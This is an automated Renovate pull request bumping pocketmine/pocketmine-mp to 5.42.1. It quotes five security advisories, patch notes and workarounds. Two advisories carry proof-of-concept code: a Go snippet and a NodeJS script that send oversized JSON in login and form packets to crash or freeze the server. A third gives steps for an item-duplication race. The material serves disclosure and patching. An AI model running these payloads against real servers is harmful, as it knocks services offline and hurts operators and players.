chore(deps): update dependency pocketmine/pocketmine-mp to v5.42.1 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
pocketmine/pocketmine-mp (source)	5.37.1 → 5.42.1

---

PocketMine-MP: LogDoS by large complex unknown property logging in clientData in LoginPacket

GHSA-h6rj-3m53-887h

More information

Details

Impact

Attackers can put large and/or complex structures as a value to an unknown property in the clientData JWT body in the Minecraft LoginPacket, causing the server to generate very long log messages.
Additionally, the property name is logged without any length limitations or sanitization, which can also be abused for LogDoS.

This may be used to spam the log/console, waste CPU time serializing the offending structure, and potentially to crash the server entirely.

This happens because the JsonMapper instance used to process the JWT body is configured to warn on unexpected properties instead of rejecting them outright. While this behaviour increases flexibility for random changes introduced by Microsoft, it also creates vulnerabilities if not handled carefully.

This vulnerability affects PocketMine-MP servers exposed to a public network where unknown actors may have access.

PoC

1. Connect to the server using a custom client.

2. Send a Minecraft LoginPacket containing an unexpected JSON property (e.g., invalid_key) within the ClientData.

3. Set the value of invalid_key to a highly recursive or massive object structure (e.g., an array containing millions of elements or deeply nested arrays).

4. The server hits the warnUndefinedJsonPropertyHandler, which attempts to var_export the malicious object, leading to an Out-of-Memory crash.

A := make([]interface{}, 1)
	ptr := &A
	for i := 0; i < 500; i++ {
		next := make([]interface{}, 1000)
		(*ptr)[0] = next
		ptr = &next
	}
	data := make([]int, 2000000)
	for i := 0; i < 100; i++ {
		data[i] = i
	}
	(*ptr)[0] = data
	d.PlayFabID = A

Patches

The issue was addressed in pmmp/PocketMine-MP@87d1c0c by removing the relevant var_export and limiting the length of the logged property name to 80 characters.

Workarounds

Plugins can handle DataPacketReceiveEvent to capture LoginPacket, and pre-process the clientData JWT to ensure it doesn't have any unusual properties in it. This can be achieved using JsonMapper (see the original affected code below) and setting the bExceptionOnUndefinedProperty flag to true. A JsonMapper_Exception will be thrown if the JWT is problematic.

However, it's important to caveat that this approach may cause login failures if any unexpected properties appear out of the blue in future versions (which has happened in the past).

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-h6rj-3m53-887h
• https://github.com/pmmp/PocketMine-MP/commit/87d1c0cea09d972fd4c2fafb84dac2ecab7649f0
• https://github.com/pmmp/PocketMine-MP/blob/5.41.0/src/network/mcpe/handler/LoginPacketHandler.php#L288-L302
• https://github.com/pmmp/PocketMine-MP/blob/5.41.0/src/network/mcpe/handler/LoginPacketHandler.php#L333-L349
• https://github.com/advisories/GHSA-h6rj-3m53-887h

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

PocketMine-MP: JSON decoding of unlimited size large arrays/objects in ModalFormResponse Handling

GHSA-788v-5pfp-93ff

More information

Details

Impact

The server does not meaningfully limit the size of the JSON payload in ModalFormResponsePacket. This can be abused by an attacker to waste memory and CPU on an affected server, e.g. by sending arrays with millions of elements.

The player must have a full session on the server (i.e. spawned in the world) to exploit this, as form responses are not handled unless the player is in game.

Patches

The issue was fixed in two parts:

• cef1088341e40ee7a6fa079bca47a84f3524d877 limits the size of a single form response to 10 KB, which is well above expected size, but low enough to prevent abuse
• f983f4f66d5e72d7a07109c8175799ab0ee771d5 avoids decoding the form response if there is no form associated with the given ID

Workarounds

This issue can be worked around in a plugin using DataPacketReceiveEvent by:

• checking the max size of the formData field
• making sure the form ID is not repeated

However, a full workaround for the issue would require reflection to access the Player->forms property, which is not exposed via any accessible API prior to 5.39.2.

PoC

1. Join a PocketMine-MP server as a regular player (no special permissions needed).

2. Use a modified client or packet-sending script to send a ModalFormResponsePacket with:

   • Any non-existent formId
   • formData containing a massive JSON array (e.g., 10+ MB payload).

3. The server will attempt to parse the JSON and may freeze or become unresponsive.

Example NodeJS pseudocode:

import { createClient } from 'bedrock-protocol';

const host = '127.0.0.1';
const port = 19132;
const username = 'Test';

const client = createClient({
  host,
  port,
  username,
  offline: true
});

const hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';

client.on('spawn', () => {
  console.log('[*] Connected & spawned. Sending malicious packet...');

  client.write('modal_form_response', {
    formId: 9999,       // Form inexistant
    formData: hugePayload // JSON énorme
  });

  console.log('[*] Packet sent. The server should start freezing shortly.');
});

Severity

• CVSS Score: 7.1 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

References

• https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-788v-5pfp-93ff
• https://github.com/pmmp/PocketMine-MP/commit/cef1088341e40ee7a6fa079bca47a84f3524d877
• https://github.com/pmmp/PocketMine-MP/commit/f983f4f66d5e72d7a07109c8175799ab0ee771d5
• https://github.com/advisories/GHSA-788v-5pfp-93ff

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

PocketMine-MP: Network amplification vulnerability with ActorEventPacket

GHSA-7hmv-4j2j-pp6f

More information

Details

Impact

The server handles ActorEventPacket to trigger consuming animations from vanilla clients when they eat food or drink potions.

This can be abused to make the server spam other clients, and to waste server CPU and memory. For every ActorEventPacket sent by the client, an animation event will be sent to every other player the attacker is visible to.

This is similar to various other vulnerabilities which were fixed in the network overhaul of PM4 (e.g. AnimatePacket and LevelSoundEventPacket), but somehow this one slipped through the net.

Patches

The problem was addressed in aeea1150a772a005b92bd418366f1b7cf1a91ab5 by changing the mechanism for consuming animations to be fully controlled by the server. ActorEventPacket from the client is now discarded.

Workarounds

A plugin could use DataPacketDecodeEvent to rate-limit ActorEventPacket to prevent the attack.

Severity

• CVSS Score: 4.3 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

References

• https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-7hmv-4j2j-pp6f
• https://github.com/pmmp/PocketMine-MP/commit/aeea1150a772a005b92bd418366f1b7cf1a91ab5
• https://github.com/advisories/GHSA-7hmv-4j2j-pp6f

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

PocketMine-MP: Player entities can still die and drop items in flaggedForDespawn state

GHSA-f9jp-856v-8642

More information

Details

Summary

When an entity dies, the entity is flagged for despawn, but remains in the World's entity table, meaning it's still accessible by doing World->getEntity($entityId) and other methods. The same is true of a player when quitting the server.

When a network packet arrives from a client to attack an entity, the handler fetches the entity using World->getEntity($entityId) without any checks if the entity is already marked for despawning. Depending on the timing, the entity in question might already be in the flagged-for-despawn state when the action is processed. This means that the death handler for the entity might be run multiple times, causing loot and XP to be dropped multiple times, among other potential side effects.

Reproducing steps

To reproduce this vulnerability, two clients (Player A and Player B) are required.

Prerequisites:
- Player A (Victim): Must have the valuable items to be duplicated in their inventory and 1 HP (to ensure instant death).
- Player B (Attacker): Must be equipped with a weapon capable of dealing at least 1 damage.

Steps:
1. Player A and Player B stand next to each other.
2. Player A initiates the disconnect sequence (e.g., clicking "Disconnect" or "Exit to Menu").
3. Immediately after Player A triggers the disconnect (within a split-second window), Player B must attack and kill Player A.
4. Player A's character dies server-side, and their inventory drops on the ground.
5. Player B collects the dropped items.
6. Player A logs back into the server.
7. Result: Player A still possesses the original items in their inventory, while Player B holds the dropped copies.

Patches

The issue was fixed in pmmp/PocketMine-MP@c0719b7 by adding checks for flagged-for-despawn entities in several affected locations.

While a cleaner fix would be to have World's various entity accessing methods exclude flagged-for-despawn entities, this was deemed too risky for 5.x as it would require significant internal changes.

Workarounds

Plugins can mitigate this issue on older versions by handling EntityDamageByEntityEvent, checking if the victim entity is flagged for despawn, and if so, cancelling the event.

Severity

• CVSS Score: 3.7 / 10 (Low)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

References

• https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-f9jp-856v-8642
• https://github.com/pmmp/PocketMine-MP/commit/c0719b76b18f2508143134e79bc9f1aa39109683
• https://github.com/advisories/GHSA-f9jp-856v-8642

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

PocketMine-MP has LogDoS by many junk properties in client data JWT in LoginPacket

GHSA-xp4f-g2cm-rhg7

More information

Details

Impact

Attackers can fill the body of the clientData JWT in LoginPacket with lots of junk properties, causing the server to flood warning messages, as well as wasting CPU time.

This happens because the JsonMapper instance used to process the JWT body is configured to warn on unexpected properties instead of rejecting them outright. While this behaviour increases flexibility for random changes introduced by Microsoft, it also creates vulnerabilities if not handled carefully.

This vulnerability affects PocketMine-MP servers exposed to a public network where unknown actors may have access.

Patches

This issue was fixed in c1d4a813fb8c21bfd8b9affd040da864b794df71 by restricting the number of unknown properties to 10, and rejecting the packet if this limit is exceeded. This continues to tolerate random additions to the JWT between versions, while preventing the logger from being abused by clients to slow down the server.

Workarounds

Plugins can handle DataPacketReceiveEvent to capture LoginPacket, and pre-process the clientData JWT to ensure it doesn't have any unusual properties in it. This can be achieved using JsonMapper (see the original affected code below) and setting the bExceptionOnUndefinedProperty flag to true. A JsonMapper_Exception will be thrown if the JWT is problematic.

However, it's important to caveat that this approach may cause login failures if any unexpected properties appear out of the blue in future versions (which has happened in the past).

References

Affected code:

https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L289-L303
https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L334-L350

Severity

• CVSS Score: 6.9 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

References

• https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-xp4f-g2cm-rhg7
• https://github.com/pmmp/PocketMine-MP/commit/c1d4a813fb8c21bfd8b9affd040da864b794df71
• https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L289-L303
• https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L334-L350
• https://github.com/advisories/GHSA-xp4f-g2cm-rhg7

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

pmmp/PocketMine-MP (pocketmine/pocketmine-mp)

v5.42.1: PocketMine-MP 5.42.1

Compare Source

For Minecraft: Bedrock Edition 1.26.10 (display version v26.10)

This is a security and bugfix release. Updating is strongly recommended.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.42.0: PocketMine-MP 5.42.0

Compare Source

For Minecraft: Bedrock Edition 1.26.10 (display version v26.10)

This is a support release for Minecraft: Bedrock Edition 1.26.10 (display version v26.0).

Please see the changelogs for details.

If you're upgrading from 5.40.x directly to 5.42.0, please also read the following changelogs, as the interim releases contain important changes:

• 5.41.0 - new gameplay and API features, performance improvements and network security improvements

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.41.1: PocketMine-MP 5.41.1

Compare Source

For Minecraft: Bedrock Edition 1.26.0 (display version v26.0)

This is a security release. Upgrading is strongly recommended.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.41.0: PocketMine-MP 5.41.0

Compare Source

For Minecraft: Bedrock Edition 1.26.0 (display version v26.0)

This is a minor feature release, including new gameplay and API features, performance improvements and network security improvements.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.40.0: PocketMine-MP 5.40.0

Compare Source

For Minecraft: Bedrock Edition 1.26.0 (display version v26.0)

This is a support release for Minecraft: Bedrock Edition 1.26.0 (display version v26.0).

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.3: PocketMine-MP 5.39.3

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a security and bugfix release.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.2: PocketMine-MP 5.39.2

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a security and bugfix release.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.1: PocketMine-MP 5.39.1

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a bugfix release.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.0: PocketMine-MP 5.39.0

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a minor feature release, including major performance improvements to world generation, new gameplay features, new API additions and other improvements.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.38.0: PocketMine-MP 5.38.0

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a support release for Minecraft: Bedrock Edition 1.21.130.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.37.3: PocketMine-MP 5.37.3

Compare Source

For Minecraft: Bedrock Edition 1.21.124

This release fixes the Docker image build.
Otherwise, it is identical to 5.37.2.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.37.2: PocketMine-MP 5.37.2

Compare Source

For Minecraft: Bedrock Edition 1.21.124

This is a bugfix and protocol support release.

While the headline version is .124, .120-.123 are still accepted since there are no protocol changes relevant to PM in these versions.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.